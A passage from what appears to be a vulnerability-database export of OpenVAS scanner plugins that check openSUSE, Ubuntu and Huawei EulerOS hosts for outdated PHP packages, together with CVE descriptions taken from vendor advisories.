isrpmvuln(pkg:\"php7-shmop-debuginfo\", rpm:\"php7-shmop-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp\", rpm:\"php7-snmp~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp-debuginfo\", rpm:\"php7-snmp-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap\", rpm:\"php7-soap~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap-debuginfo\", rpm:\"php7-soap-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets\", rpm:\"php7-sockets~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets-debuginfo\", rpm:\"php7-sockets-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite\", rpm:\"php7-sqlite~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite-debuginfo\", rpm:\"php7-sqlite-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg\", rpm:\"php7-sysvmsg~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg-debuginfo\", rpm:\"php7-sysvmsg-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem\", rpm:\"php7-sysvsem~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem-debuginfo\", rpm:\"php7-sysvsem-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm\", rpm:\"php7-sysvshm~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm-debuginfo\", rpm:\"php7-sysvshm-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy\", rpm:\"php7-tidy~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy-debuginfo\", rpm:\"php7-tidy-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer\", rpm:\"php7-tokenizer~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer-debuginfo\", rpm:\"php7-tokenizer-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx\", rpm:\"php7-wddx~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx-debuginfo\", rpm:\"php7-wddx-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader\", rpm:\"php7-xmlreader~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader-debuginfo\", rpm:\"php7-xmlreader-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc\", rpm:\"php7-xmlrpc~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc-debuginfo\", rpm:\"php7-xmlrpc-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter\", rpm:\"php7-xmlwriter~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter-debuginfo\", rpm:\"php7-xmlwriter-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl\", rpm:\"php7-xsl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl-debuginfo\", rpm:\"php7-xsl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip\", rpm:\"php7-zip~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip-debuginfo\", rpm:\"php7-zip-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib\", rpm:\"php7-zlib~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib-debuginfo\", rpm:\"php7-zlib-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear\", rpm:\"php7-pear~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear-Archive_Tar\", rpm:\"php7-pear-Archive_Tar~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for php7.0 USN-3382-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2017-9224", "CVE-2017-9228", "CVE-2017-9226", "CVE-2017-11143", "CVE-2017-9229", "CVE-2017-9227", "CVE-2017-11628", "CVE-2015-8994", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843281", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843281", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3382_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for php7.0 USN-3382-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843281\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-11 07:22:54 +0200 (Fri, 11 Aug 2017)\");\n script_cve_id(\"CVE-2015-8994\", \"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\",\n \"CVE-2017-11145\", \"CVE-2017-11147\", \"CVE-2017-11362\", \"CVE-2017-11628\",\n \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\",\n \"CVE-2017-9229\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for php7.0 USN-3382-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7.0'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the PHP opcache\n created keys for files it cached based on their filepath. A local attacker could\n possibly use this issue in a shared hosting environment to obtain sensitive\n information. This issue only affected Ubuntu 14.04 LTS. (CVE-2015-8994) It was\n discovered that the PHP URL parser incorrectly handled certain URI components. A\n remote attacker could possibly use this issue to bypass hostname-specific URL\n checks. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-10397) It was\n discovered that PHP incorrectly handled certain boolean parameters when\n unserializing data. A remote attacker could possibly use this issue to cause PHP\n to crash, resulting in a denial of service. This issue only affected Ubuntu\n 14.04 LTS. (CVE-2017-11143) Sebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang\n discovered that PHP incorrectly handled the OpenSSL sealing function. A remote\n attacker could possibly use this issue to cause PHP to crash, resulting in a\n denial of service. (CVE-2017-11144) Wei Lei and Liu Yang discovered that the PHP\n date extension incorrectly handled memory. A remote attacker could possibly use\n this issue to disclose sensitive information from the server. (CVE-2017-11145)\n It was discovered that PHP incorrectly handled certain PHAR archives. A remote\n attacker could use this issue to cause PHP to crash or disclose sensitive\n information. This issue only affected Ubuntu 14.04 LTS. (CVE-2017-11147) It was\n discovered that PHP incorrectly handled locale length. A remote attacker could\n possibly use this issue to cause PHP to crash, resulting in a denial of service.\n (CVE-2017-11362) Wei Lei and Liu Yang discovered that PHP incorrectly handled\n parsing ini files. An attacker could possibly use this issue to cause PHP to\n crash, resulting in a denial of service. (CVE-2017-11628) It was discovered that\n PHP mbstring incorrectly handled certain regular expressions. A remote attacker\n could use this issue to cause PHP to crash, resulting in a denial of service, or\n possibly execute arbitrary code. (CVE-2017-9224, CVE-2017-9226, CVE-2017-9227,\n CVE-2017-9228, CVE-2017-9229)\");\n script_tag(name:\"affected\", value:\"php7.0 on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3382-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3382-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:37:52", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2016-7414", "CVE-2017-12933", "CVE-2017-9226", "CVE-2016-4540", "CVE-2015-8879", "CVE-2016-9935", "CVE-2016-3185", "CVE-2017-11143", "CVE-2015-8867", "CVE-2016-4543", "CVE-2016-4542", "CVE-2016-4541", "CVE-2016-2554", "CVE-2015-6833", "CVE-2016-4070", "CVE-2016-9934", "CVE-2015-6831", "CVE-2017-11147", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2015-8935", "CVE-2016-10161", "CVE-2016-3141", "CVE-2017-11144", "CVE-2015-6832", "CVE-2016-3142"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192221", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192221", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2221\");\n script_version(\"2020-01-23T12:40:31+0000\");\n script_cve_id(\"CVE-2014-9767\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-8867\", \"CVE-2015-8879\", \"CVE-2015-8935\", \"CVE-2016-10161\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-7124\", \"CVE-2016-7414\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11147\", \"CVE-2017-12933\", \"CVE-2017-9226\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:40:31 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:40:31 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2221)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2221\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2221\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-2221 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.(CVE-2016-7124)\n\nStack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6831)\n\nThe sapi_header_op function in main/SAPI.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 supports deprecated line folding without considering browser compatibility, which allows remote attackers to conduct cross-site scripting (XSS) attacks against Internet Explorer by leveraging (1) %0A%20 or (2) %0D%0A%20 mishandling in the header function.(CVE-2015-8935)\n\nThe openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 incorrectly relies on the deprecated RAND_pseudo_bytes function, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors.(CVE-2015-8867)\n\nUse-after-free vulnerability in the SPL unserialize implementation in ext/spl/spl_array.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to execute arbitrary code via crafted serialized data that triggers misuse of an array field.(CVE-2015-6832)\n\nDirectory traversal vulnerability in the PharData class in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to write to arbitrary files via a .. (dot dot) in a ZIP archive entry that is mishandled during an extractTo call.(CVE-2015-6833)\n\nDirectory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\nThe ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory acce ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~45.h19.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:00:02", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-07-03T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2020-1747)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2014-9767", "CVE-2016-7414", "CVE-2017-12933", "CVE-2019-11050", "CVE-2014-9912", "CVE-2016-6288", "CVE-2011-4718", "CVE-2017-9226", "CVE-2016-4540", "CVE-2015-8879", "CVE-2016-9935", "CVE-2016-5772", "CVE-2016-3185", "CVE-2018-10545", "CVE-2017-11143", "CVE-2018-5712", "CVE-2015-8867", "CVE-2019-19204", "CVE-2016-7125", "CVE-2016-4542", "CVE-2019-11041", "CVE-2017-11628", "CVE-2017-7272", "CVE-2016-2554", "CVE-2018-14851", "CVE-2019-11042", "CVE-2017-16642", "CVE-2015-6833", "CVE-2016-4070", "CVE-2015-8874", "CVE-2016-6292", "CVE-2016-9934", "CVE-2015-4116", "CVE-2015-6831", "CVE-2017-11147", "CVE-2016-10159", "CVE-2019-9641", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2016-4073", "CVE-2019-11043", "CVE-2016-6294", "CVE-2016-7128", "CVE-2015-8935", "CVE-2015-7803", "CVE-2016-7418", "CVE-2018-17082", "CVE-2015-8866", "CVE-2019-19246", "CVE-2016-10161", "CVE-2016-3141", "CVE-2018-10547", "CVE-2016-6291", "CVE-2016-10158", "CVE-2019-11047", "CVE-2017-11145", "CVE-2017-11144", "CVE-2015-6832", "CVE-2016-3142", "CVE-2018-5711", "CVE-2015-7804", "CVE-2016-7412"], "modified": "2020-07-03T00:00:00", "id": "OPENVAS:1361412562311220201747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201747", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1747\");\n script_version(\"2020-07-03T06:19:30+0000\");\n script_cve_id(\"CVE-2011-4718\", \"CVE-2014-9767\", \"CVE-2014-9912\", \"CVE-2015-4116\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-7803\", \"CVE-2015-7804\", \"CVE-2015-8866\", \"CVE-2015-8867\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2015-8935\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10161\", \"CVE-2016-10397\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4073\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4542\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-5772\", \"CVE-2016-6288\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7128\", \"CVE-2016-7412\", \"CVE-2016-7414\", \"CVE-2016-7418\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\", \"CVE-2017-7272\", \"CVE-2017-9226\", \"CVE-2018-10545\", \"CVE-2018-10547\", \"CVE-2018-14851\", \"CVE-2018-17082\", \"CVE-2018-5711\", \"CVE-2018-5712\", \"CVE-2019-11041\", \"CVE-2019-11042\", \"CVE-2019-11043\", \"CVE-2019-11047\", \"CVE-2019-11050\", \"CVE-2019-19204\", \"CVE-2019-19246\", \"CVE-2019-9641\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", 